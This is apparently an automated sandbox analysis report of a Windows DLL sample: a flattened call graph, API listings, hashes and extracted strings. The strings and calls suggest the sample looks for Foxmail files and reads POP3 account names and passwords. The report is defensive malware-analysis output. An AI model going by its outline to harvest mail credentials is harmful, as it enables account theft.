7152 10005386 7150->7152 7151->7153 7154 1000571e _free 20 API calls 7152->7154 7153->7150 7155 10005399 7154->7155 7156 1000571e _free 20 API calls 7155->7156 7157 100053aa 7156->7157 7158 1000571e _free 20 API calls 7157->7158 7159 100053bb 7158->7159 7546 100073d5 7547 100073e1 ___DestructExceptionObject 7546->7547 7558 10005671 RtlEnterCriticalSection 7547->7558 7549 100073e8 7550 10008be3 27 API calls 7549->7550 7552 100073f7 7550->7552 7551 10007406 7570 10007422 7551->7570 7552->7551 7559 10007269 GetStartupInfoW 7552->7559 7555 10007417 _abort 7558->7549 7560 10007286 7559->7560 7561 10007318 7559->7561 7560->7561 7562 10008be3 27 API calls 7560->7562 7565 1000731f 7561->7565 7563 100072af 7562->7563 7563->7561 7564 100072dd GetFileType 7563->7564 7564->7563 7566 10007326 7565->7566 7567 10007369 GetStdHandle 7566->7567 7568 100073d1 7566->7568 7569 1000737c GetFileType 7566->7569 7567->7566 7568->7551 7569->7566 7573 100056b9 RtlLeaveCriticalSection 7570->7573 7572 10007429 7572->7555 7573->7572 7574 10004ed7 7575 10006d60 51 API calls 7574->7575 7576 10004ee9 7575->7576 7585 10007153 GetEnvironmentStringsW 7576->7585 7579 10004ef4 7581 1000571e _free 20 API calls 7579->7581 7582 10004f29 7581->7582 7583 10004eff 7584 1000571e _free 20 API calls 7583->7584 7584->7579 7586 1000716a 7585->7586 7596 100071bd 7585->7596 7587 10007170 WideCharToMultiByte 7586->7587 7590 1000718c 7587->7590 7587->7596 7588 100071c6 FreeEnvironmentStringsW 7589 10004eee 7588->7589 7589->7579 7597 10004f2f 7589->7597 7591 100056d0 21 API calls 7590->7591 7592 10007192 7591->7592 7593 100071af 7592->7593 7594 10007199 WideCharToMultiByte 7592->7594 7595 1000571e _free 20 API calls 7593->7595 7594->7593 7595->7596 7596->7588 7596->7589 7598 10004f44 7597->7598 7599 1000637b _abort 20 API calls 7598->7599 7600 10004f6b 7599->7600 7601 10004fcf 7600->7601 7604 1000637b _abort 20 API calls 7600->7604 7605 10004fd1 7600->7605 7607 1000544d ___std_exception_copy 26 API calls 7600->7607 
7610 10004ff3 7600->7610 7612 1000571e _free 20 API calls 7600->7612 7602 1000571e _free 20 API calls 7601->7602 7603 10004fe9 7602->7603 7603->7583 7604->7600 7606 10005000 20 API calls 7605->7606 7608 10004fd7 7606->7608 7607->7600 7609 1000571e _free 20 API calls 7608->7609 7609->7601 7611 100062bc ___std_exception_copy 11 API calls 7610->7611 7613 10004fff 7611->7613 7612->7600 6122 10002418 6123 10002420 ___scrt_release_startup_lock 6122->6123 6126 100047f5 6123->6126 6125 10002448 6127 10004804 6126->6127 6128 10004808 6126->6128 6127->6125 6131 10004815 6128->6131 6132 10005b7a __dosmaperr 20 API calls 6131->6132 6135 1000482c 6132->6135 6133 10002ada _ValidateLocalCookies 5 API calls 6134 10004811 6133->6134 6134->6125 6135->6133 7445 10004a9a 7448 10005411 7445->7448 7449 1000541d _abort 7448->7449 7450 10005af6 _abort 38 API calls 7449->7450 7453 10005422 7450->7453 7451 100055a8 _abort 38 API calls 7452 1000544c 7451->7452 7453->7451 5864 10001c5b 5865 10001c6b ___scrt_fastfail 5864->5865 5868 100012ee 5865->5868 5867 10001c87 5869 10001324 ___scrt_fastfail 5868->5869 5870 100013b7 GetEnvironmentVariableW 5869->5870 5894 100010f1 5870->5894 5873 100010f1 57 API calls 5874 10001465 5873->5874 5875 100010f1 57 API calls 5874->5875 5876 10001479 5875->5876 5877 100010f1 57 API calls 5876->5877 5878 1000148d 5877->5878 5879 100010f1 57 API calls 5878->5879 5880 100014a1 5879->5880 5881 100010f1 57 API calls 5880->5881 5882 100014b5 lstrlenW 5881->5882 5883 100014d2 5882->5883 5884 100014d9 lstrlenW 5882->5884 5883->5867 5885 100010f1 57 API calls 5884->5885 5886 10001501 lstrlenW lstrcatW 5885->5886 5887 100010f1 57 API calls 5886->5887 5888 10001539 lstrlenW lstrcatW 5887->5888 5889 100010f1 57 API calls 5888->5889 5890 1000156b lstrlenW lstrcatW 5889->5890 5891 100010f1 57 API calls 5890->5891 5892 1000159d lstrlenW lstrcatW 5891->5892 5893 100010f1 57 API calls 5892->5893 5893->5883 5895 10001118 ___scrt_fastfail 5894->5895 5896 10001129 lstrlenW 
5895->5896 5907 10002c40 5896->5907 5898 10001148 lstrcatW lstrlenW 5899 10001177 lstrlenW FindFirstFileW 5898->5899 5900 10001168 lstrlenW 5898->5900 5901 100011a0 5899->5901 5902 100011e1 5899->5902 5900->5899 5903 100011c7 FindNextFileW 5901->5903 5906 100011aa 5901->5906 5902->5873 5903->5901 5904 100011da FindClose 5903->5904 5904->5902 5906->5903 5909 10001000 5906->5909 5908 10002c57 5907->5908 5908->5898 5908->5908 5910 10001022 ___scrt_fastfail 5909->5910 5911 100010af 5910->5911 5912 1000102f lstrcatW lstrlenW 5910->5912 5913 100010b5 lstrlenW 5911->5913 5914 100010ad 5911->5914 5915 1000105a lstrlenW 5912->5915 5916 1000106b lstrlenW 5912->5916 5940 10001e16 5913->5940 5914->5906 5915->5916 5926 10001e89 lstrlenW 5916->5926 5919 10001088 GetFileAttributesW 5919->5914 5921 1000109c 5919->5921 5920 100010ca 5920->5914 5922 10001e89 5 API calls 5920->5922 5921->5914 5932 1000173a 5921->5932 5924 100010df 5922->5924 5945 100011ea 5924->5945 5927 10002c40 ___scrt_fastfail 5926->5927 5928 10001ea7 lstrcatW lstrlenW 5927->5928 5929 10001ed1 lstrcatW 5928->5929 5930 10001ec2 5928->5930 5929->5919 5930->5929 5931 10001ec7 lstrlenW 5930->5931 5931->5929 5933 10001747 ___scrt_fastfail 5932->5933 5960 10001cca 5933->5960 5935 1000199f 5935->5914 5938 10001824 ___scrt_fastfail _strlen 5938->5935 5980 100015da 5938->5980 5941 10001e29 5940->5941 5944 10001e4c 5940->5944 5942 10001e2d lstrlenW 5941->5942 5941->5944 5943 10001e3f lstrlenW 5942->5943 5942->5944 5943->5944 5944->5920 5946 1000120e ___scrt_fastfail 5945->5946 5947 10001e89 5 API calls 5946->5947 5948 10001220 GetFileAttributesW 5947->5948 5949 10001235 5948->5949 5950 10001246 5948->5950 5949->5950 5952 1000173a 35 API calls 5949->5952 5951 10001e89 5 API calls 5950->5951 5953 10001258 5951->5953 5952->5950 5954 100010f1 56 API calls 5953->5954 5955 1000126d 5954->5955 5956 10001e89 5 API calls 5955->5956 5957 1000127f ___scrt_fastfail 5956->5957 5958 100010f1 56 API calls 5957->5958 5959 100012e6 
5958->5959 5959->5914 5961 10001cf1 ___scrt_fastfail 5960->5961 5962 10001d0f CopyFileW CreateFileW 5961->5962 5963 10001d44 DeleteFileW 5962->5963 5964 10001d55 GetFileSize 5962->5964 5969 10001808 5963->5969 5965 10001ede 22 API calls 5964->5965 5966 10001d66 ReadFile 5965->5966 5967 10001d94 CloseHandle DeleteFileW 5966->5967 5968 10001d7d CloseHandle DeleteFileW 5966->5968 5967->5969 5968->5969 5969->5935 5970 10001ede 5969->5970 5972 1000222f 5970->5972 5973 1000224e 5972->5973 5976 10002250 5972->5976 5988 1000474f 5972->5988 5993 100047e5 5972->5993 5973->5938 5975 10002908 5977 100035d2 __CxxThrowException@8 RaiseException 5975->5977 5976->5975 6000 100035d2 5976->6000 5979 10002925 5977->5979 5979->5938 5981 1000160c _strcat _strlen 5980->5981 5982 1000163c lstrlenW 5981->5982 6088 10001c9d 5982->6088 5984 10001655 lstrcatW lstrlenW 5985 10001678 5984->5985 5986 10001693 ___scrt_fastfail 5985->5986 5987 1000167e lstrcatW 5985->5987 5986->5938 5987->5986 6003 10004793 5988->6003 5990 10004765 6009 10002ada 5990->6009 5992 1000478f 5992->5972 5995 100056d0 _abort 5993->5995 5994 1000570e 6022 10006368 5994->6022 5995->5994 5997 100056f9 RtlAllocateHeap 5995->5997 5999 1000474f _abort 7 API calls 5995->5999 5997->5995 5998 1000570c 5997->5998 5998->5972 5999->5995 6002 100035f2 RaiseException 6000->6002 6002->5975 6004 1000479f ___DestructExceptionObject 6003->6004 6016 10005671 RtlEnterCriticalSection 6004->6016 6006 100047aa 6017 100047dc 6006->6017 6008 100047d1 _abort 6008->5990 6010 10002ae3 6009->6010 6011 10002ae5 IsProcessorFeaturePresent 6009->6011 6010->5992 6013 10002b58 6011->6013 6021 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6013->6021 6015 10002c3b 6015->5992 6016->6006 6020 100056b9 RtlLeaveCriticalSection 6017->6020 6019 100047e3 6019->6008 6020->6019 6021->6015 6025 10005b7a GetLastError 6022->6025 6026 10005b93 6025->6026 6027 10005b99 6025->6027 6044 10005e08 6026->6044 6031 10005bf0 
SetLastError 6027->6031 6051 1000637b 6027->6051 6033 10005bf9 6031->6033 6032 10005bb3 6058 1000571e 6032->6058 6033->5998 6037 10005bb9 6040 10005be7 SetLastError 6037->6040 6038 10005bcf 6071 1000593c 6038->6071 6040->6033 6042 1000571e _free 17 API calls 6043 10005be0 6042->6043 6043->6031 6043->6040 6076 10005c45 6044->6076 6046 10005e2f 6047 10005e47 TlsGetValue 6046->6047 6048 10005e3b 6046->6048 6047->6048 6049 10002ada _ValidateLocalCookies 5 API calls 6048->6049 6050 10005e58 6049->6050 6050->6027 6056 10006388 _abort 6051->6056 6052 100063c8 6055 10006368 __dosmaperr 19 API calls 6052->6055 6053 100063b3 RtlAllocateHeap 6054 10005bab 6053->6054 6053->6056 6054->6032 6064 10005e5e 6054->6064 6055->6054 6056->6052 6056->6053 6057 1000474f _abort 7 API calls 6056->6057 6057->6056 6059 10005729 HeapFree 6058->6059 6063 10005752 __dosmaperr 6058->6063 6060 1000573e 6059->6060 6059->6063 6061 10006368 __dosmaperr 18 API calls 6060->6061 6062 10005744 GetLastError 6061->6062 6062->6063 6063->6037 6065 10005c45 _abort 5 API calls 6064->6065 6066 10005e85 6065->6066 6067 10005ea0 TlsSetValue 6066->6067 6068 10005e94 6066->6068 6067->6068 6069 10002ada _ValidateLocalCookies 5 API calls 6068->6069 6070 10005bc8 6069->6070 6070->6032 6070->6038 6082 10005914 6071->6082 6077 10005c71 6076->6077 6078 10005c75 __crt_fast_encode_pointer 6076->6078 6077->6078 6079 10005ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6077->6079 6081 10005c95 6077->6081 6078->6046 6079->6077 6080 10005ca1 GetProcAddress 6080->6078 6081->6078 6081->6080 6083 10005854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6082->6083 6084 10005938 6083->6084 6085 100058c4 6084->6085 6086 10005758 _abort 20 API calls 6085->6086 6087 100058e8 6086->6087 6087->6042 6089 10001ca6 _strlen 6088->6089 6089->5984 7614 100020db 7617 100020e7 ___DestructExceptionObject 7614->7617 7615 100020f6 7616 10002110 dllmain_raw 7616->7615 7618 1000212a 7616->7618 7617->7615 7617->7616 7622 

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                              • FindClose.KERNEL32(00000000), ref: 100011DB
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                              • String ID:
                                                              • API String ID: 1083526818-0
                                                              • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                              • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                              • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                              • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                              Control-flow Graph

                                                              APIs
                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                              • lstrlenW.KERNEL32(?), ref: 100014C5
                                                              • lstrlenW.KERNEL32(?), ref: 100014E0
                                                              • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                              • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                              • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                              • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                              • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                              • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                              • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                              • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                              • String ID: )$Foxmail$ProgramFiles
                                                              • API String ID: 672098462-2938083778
                                                              • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                              • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                              • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                              • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2099061454-0
                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2099061454-0
                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                              • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                              • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE

                                                              Control-flow Graph (rendered graph not reproduced)
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                              • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                              • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                              • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProcProtectVirtual$HandleModule
                                                              • String ID:
                                                              • API String ID: 2152742572-0
                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                              • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                              • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID:
                                                              • API String ID: 3906539128-0
                                                              • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                              • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                              • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                              • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                              • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                              • ExitProcess.KERNEL32 ref: 10004AEE
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                              • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                              • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                              • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .
                                                              • API String ID: 0-248832578
                                                              • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                              • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                              • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                              • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                              • Instruction ID: 1e6cba0042ebf2c12c09a4b69519b161692f08ba8376aa17aabccb2fe2e68a66
                                                              • Opcode Fuzzy Hash: 460c158515a4b2323efe0f0dc9aa5714cfdfaf7ec70cb60f3b96f32d1927db1d
                                                              • Instruction Fuzzy Hash: 81A01130A002228FE3208F308A8A30E3AACAA002C0B00803AE80CC0028EB30C0028B00

                                                              Control-flow Graph (rendered graph not reproduced)
                                                              APIs
                                                                • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                              • _strlen.LIBCMT ref: 10001855
                                                              • _strlen.LIBCMT ref: 10001869
                                                              • _strlen.LIBCMT ref: 1000188B
                                                              • _strlen.LIBCMT ref: 100018AE
                                                              • _strlen.LIBCMT ref: 100018C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _strlen$File$CopyCreateDelete
                                                              • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                              • API String ID: 3296212668-3023110444
                                                              • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                              • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                              • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.4488732227.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000009.00000002.4488710050.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000009.00000002.4488732227.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: %m$~$Gon~$~F@7$~dra
                                                              • API String ID: 4218353326-230879103
                                                              • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                              • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                              • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0

                                                              Control-flow Graph (rendered graph not reproduced)
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
